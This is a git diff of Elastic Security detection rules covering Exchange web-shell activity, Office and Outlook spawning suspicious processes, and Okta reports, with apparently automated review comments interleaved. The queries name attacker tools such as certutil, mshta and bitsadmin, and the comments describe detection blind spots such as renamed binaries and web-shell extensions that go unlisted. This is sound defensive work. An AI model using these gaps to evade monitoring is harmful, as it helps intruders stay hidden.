@@ -17,6 +17,38 @@
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "destination.port",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.transport",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "source.ip",
+ "type": "ip"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "c82b2bd8-d701-420c-ba43-f11a155b681a",
 "severity": "high",
@@ -62,5 +94,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 11
+ "version": 12
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_activity_reported_by_okta_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_activity_reported_by_okta_user.json
index abcc8d06444e0..d2d2231f7a1bc 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_activity_reported_by_okta_user.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_activity_reported_by_okta_user.json
@@ -13,14 +13,33 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Suspicious Activity Reported by Okta User",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:user.account.report_suspicious_activity_by_enduser\n",
 "references": [
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "f994964f-6fce-4d75-8e79-e16ccc412588",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -94,5 +113,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_mac_ms_office_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_mac_ms_office_child_process.json
index 73b0718e0f27d..1dc01af8d100f 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_mac_ms_office_child_process.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_mac_ms_office_child_process.json
@@ -14,6 +14,28 @@
 "references": [
 "https://blog.malwarebytes.com/cybercrime/2017/02/microsoft-office-macro-malware-targets-macs/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "66da12b1-ac83-40eb-814c-07ed1d82b7b9",
 "severity": "medium",
@@ -50,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 2
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_files.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_files.json
index ba307ded580b4..81eafc8a65407 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_files.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_files.json
@@ -17,14 +17,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Exchange Server UM Writing Suspicious Files", - "note": "## Triage and analysis\n\nPositive hits can be checked against the established Microsoft [baselines](https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines).\n\nMicrosoft highly recommends that the best course of action is patching, but this may not protect already compromised systems\nfrom existing intrusions. Other tools for detecting and mitigating can be found within their Exchange support\n[repository](https://github.com/microsoft/CSS-Exchange/tree/main/Security)\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\nPositive hits can be checked against the established Microsoft [baselines](https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines).\n\nMicrosoft highly recommends that the best course of action is patching, but this may not protect already compromised systems\nfrom existing intrusions. 
Other tools for detecting and mitigating can be found within their Exchange support\n[repository](https://github.com/microsoft/CSS-Exchange/tree/main/Security)", "query": "file where event.type == \"creation\" and\n process.name : (\"UMWorkerProcess.exe\", \"umservice.exe\") and\n file.extension : (\"php\", \"jsp\", \"js\", \"aspx\", \"asmx\", \"asax\", \"cfm\", \"shtml\") and\n (\n file.path : \"?:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\" or\n\n (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\*\" and\n not (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\version\\\\*\" or\n file.name : (\"errorFE.aspx\", \"expiredpassword.aspx\", \"frowny.aspx\", \"GetIdToken.htm\", \"logoff.aspx\",\n \"logon.aspx\", \"OutlookCN.aspx\", \"RedirSuiteServiceProxy.aspx\", \"signout.aspx\"))) or\n\n (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\ecp\\\\auth\\\\*\" and\n not file.name : \"TimeoutLogoff.aspx\")\n )\n", "references": [ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp 
for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -52,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_process.json index a1b371b84d7ac..3645a665213ea 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_process.json 
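Review bot: The `file.extension` list in the retained `query` line stops at `asmx`/`asax`, so a web shell that `UMWorkerProcess.exe` writes as `.asp`, `.ashx` or `.ascx` — extensions IIS typically maps to script handlers alongside `.aspx` — lands in the monitored `owa\auth` and `aspnet_client` paths without firing. Since this commit already reworks the rule's metadata and bumps `version` to 5, widening the list in the same change is cheap: `file.extension : ("php", "jsp", "js", "asp", "aspx", "ascx", "ashx", "asmx", "asax", "cfm", "shtml")`. The `file.name` exemptions for the stock `owa\auth` pages are name-only and the rule keys on `event.type == "creation"`, so a delete-then-recreate of `logon.aspx` is a creation the rule skips; that blind spot is worth a sentence in the new `note`, which currently only points at the Microsoft baselines.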
@@ -16,14 +16,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Exchange Server UM Spawning Suspicious Processes", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type == \"start\" and\n process.parent.name : (\"UMService.exe\", \"UMWorkerProcess.exe\") and\n not process.name : (\"werfault.exe\", \"wermgr.exe\")\n", + "note": "", + "query": "process where event.type == \"start\" and\n process.parent.name : (\"UMService.exe\", \"UMWorkerProcess.exe\") and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\werfault.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V??\\\\Bin\\\\UMWorkerProcess.exe\",\n \"D:\\\\Exchange 2016\\\\Bin\\\\UMWorkerProcess.exe\",\n \"E:\\\\ExchangeServer\\\\Bin\\\\UMWorkerProcess.exe\")\n", "references": [ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", 
"tags": [ "Elastic", @@ -51,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_worker_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_worker_child_process.json index f125a3b27e25d..a9d993e4af246 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_worker_child_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_exchange_worker_child_process.json 
@@ -12,15 +12,43 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Exchange Worker Spawning Suspicious Processes", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.parent.name : \"w3wp.exe\" and process.parent.args : \"MSExchange*AppPool\" and\n (process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or\n process.pe.original_file_name in (\"cmd.exe\", \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\"))\n", "references": [ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities", "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", 
@@ -48,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_office_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_office_child_process.json index 656199c7fa9a4..cdc57d7147aa1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_office_child_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_office_child_process.json 
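Review bot: The `process.pe.original_file_name in ("cmd.exe", "powershell.exe", "pwsh.dll", "powershell_ise.exe")` fallback in the retained `query` line uses EQL's `in`, which is case-sensitive, unlike the `:` operator used for `process.name` a few tokens earlier. The OriginalFilename resource of these binaries is mixed case (`Cmd.Exe`, `PowerShell.EXE`, `powershell_ise.EXE`), so if the shipper indexes the value verbatim the renamed-binary branch this clause exists for would never match — exactly the evasion it is meant to catch. Switching to the case-insensitive form, `process.pe.original_file_name : ("cmd.exe", "powershell.exe", "pwsh.dll", "powershell_ise.exe")` (or `in~` on stacks that support it), closes that without touching the new `required_fields` entry for the field. This `severity: high` rule also ends the commit with `"note": ""` while the Office/Outlook rules in the same change received full investigation guides; a short triage section pointing at the `w3wp.exe`/`MSExchange*AppPool` parent context would be in keeping.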
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious MS Office Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : (\"eqnedt32.exe\", \"excel.exe\", \"fltldr.exe\", \"msaccess.exe\", \"mspub.exe\", \"powerpnt.exe\", \"winword.exe\", \"outlook.exe\") and\n process.name : (\"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\", \"cdb.exe\", \"certutil.exe\",\n \"cmd.exe\", \"cmstp.exe\", \"control.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\", \"dsquery.exe\", \"forfiles.exe\", \n \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\", \"iexpress.exe\", \"installutil.exe\", \"ipconfig.exe\", \n \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\", \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\", \n \"ping.exe\", \"powershell.exe\", \"pwsh.exe\", \"qprocess.exe\", \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\", \n \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\", \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\", \"whoami.exe\",\n \"wmic.exe\", \"wscript.exe\", \"xwizard.exe\", \"explorer.exe\", \"rundll32.exe\", \"hh.exe\", \"msdt.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious MS Office Child Process\n\nMicrosoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer.\nYou can create and edit documents containing text and images, work with data in spreadsheets and databases, and 
create\npresentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted\nfor initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThis rule looks for suspicious processes spawned by MS Office programs. This is generally the result of the execution of\nmalicious documents.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include,\nbut are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. 
\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : (\"eqnedt32.exe\", \"excel.exe\", \"fltldr.exe\", \"msaccess.exe\", \"mspub.exe\", \"powerpnt.exe\", \"winword.exe\", \"outlook.exe\") and\n process.name : (\"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\", \"cdb.exe\", \"certutil.exe\",\n \"cmd.exe\", \"cmstp.exe\", \"control.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\", \"dsquery.exe\", \"forfiles.exe\",\n \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\", \"iexpress.exe\", \"installutil.exe\", \"ipconfig.exe\",\n \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\", \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\",\n \"ping.exe\", \"powershell.exe\", \"pwsh.exe\", \"qprocess.exe\", \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\",\n \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\", \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\", \"whoami.exe\",\n \"wmic.exe\", \"wscript.exe\", \"xwizard.exe\", \"explorer.exe\", \"rundll32.exe\", \"hh.exe\", \"msdt.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such 
as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_outlook_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_outlook_child_process.json index fdb5fdac2629a..a7b9fba92b586 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_outlook_child_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_suspicious_ms_outlook_child_process.json 
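Review bot: The new triage guide asks the analyst to check whether the child's executable is in its expected location and validly signed, but the `query` line that is kept only matches `process.name`, so a copy of `certutil.exe` or `mshta.exe` dropped under another name never reaches that analysis in the first place. The Exchange worker rule elsewhere in this diff already uses a `process.pe.original_file_name` fallback for that case; the same shape fits here by wrapping the `process.name` list in parentheses and adding `or process.pe.original_file_name : ("cmd.exe", "powershell.exe", "pwsh.dll", "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe")`, with `process.pe.original_file_name` added to the new `required_fields` array. The guide's "Use the PowerShell Get-FileHash cmdlet" step sits before the "Isolate the involved host" step in the response section; a clause saying the hashing is done on a collected copy rather than interactively on the suspect host would avoid an analyst executing tooling on a box the guide then tells them to isolate.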
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious MS Outlook Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious MS Outlook Child Process\n\nMicrosoft Outlook is an email client that provides contact, email calendar, and task management features. Outlook is\nwidely used, either standalone or as part of the Office suite.\n\nThis rule looks for suspicious processes spawned by MS Outlook, which can be the result of the execution of malicious\ndocuments and/or exploitation for initial access.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve recently opened files received via email and opened by the user that could cause this behavior. 
Common\nlocations include but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. 
This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. \n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"outlook.exe\" and\n process.name : (\"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\",\n \"cdb.exe\", \"certutil.exe\", \"cmd.exe\", \"cmstp.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\",\n \"dsquery.exe\", \"forfiles.exe\", \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\",\n \"iexpress.exe\", \"installutil.exe\", \"ipconfig.exe\", \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\",\n \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\", \"ping.exe\", \"powershell.exe\",\n \"pwsh.exe\", \"qprocess.exe\", \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\",\n \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\", \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\",\n \"tracert.exe\", \"whoami.exe\", \"wmic.exe\", \"wscript.exe\", \"xwizard.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", + "setup": "If enabling an EQL rule on 
a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 10 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unsecure_elasticsearch_node.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unsecure_elasticsearch_node.json index 15c7eed349361..7ce63923da109 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unsecure_elasticsearch_node.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unsecure_elasticsearch_node.json @@ -16,7 +16,7 @@ "language": "lucene", "license": "Elastic License v2", "name": "Inbound Connection to an Unsecure Elasticsearch Node", - "note": "## Config\n\nThis rule requires the addition of port `9200` and `send_all_headers` to the `HTTP` protocol configuration in `packetbeat.yml`. See the References section for additional configuration documentation.", + "note": "", "query": "event.category:network_traffic AND network.protocol:http AND status:OK AND destination.port:9200 AND network.direction:inbound AND NOT http.response.headers.content-type:\"image/x-icon\" AND NOT _exists_:http.request.headers.authorization\n", "references": [ "https://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-security.html", 
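Review bot: Every event this rule matches is also matched by the Suspicious MS Office Child Process rule updated in the same diff: that rule lists `outlook.exe` among its parents, uses the same `event.type in ("start", "process_started")` clause, and its `process.name` list is a strict superset of this one (it adds `control.exe`, `explorer.exe`, `rundll32.exe`, `hh.exe`, `msdt.exe`). The result is two alerts per hit, one at `severity: medium` / `risk_score: 47` and this one at `low` / `21`, and the lower-scored duplicate is the one whose new `note` says the activity "is unlikely to happen legitimately". If this rule is meant to stay, its `severity`/`risk_score` should be reconciled with the Office rule, or its list should cover something the Office rule does not; `msdt.exe`, present in the Office rule's list but absent here, is the obvious gap for an Outlook-delivered document. Otherwise the commit, which already bumps `version` to 12, is the natural place to mark it deprecated rather than keep both.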
@@ -24,6 +24,7 @@ ], "risk_score": 47, "rule_id": "31295df3-277b-4c56-a1fb-84e31b4222a9", + "setup": "This rule requires the addition of port `9200` and `send_all_headers` to the `HTTP` protocol configuration in `packetbeat.yml`. See the References section for additional configuration documentation.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +52,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_children.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_children.json index a842c79a8e43a..72736650835e3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_children.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_unusual_dns_service_children.json 
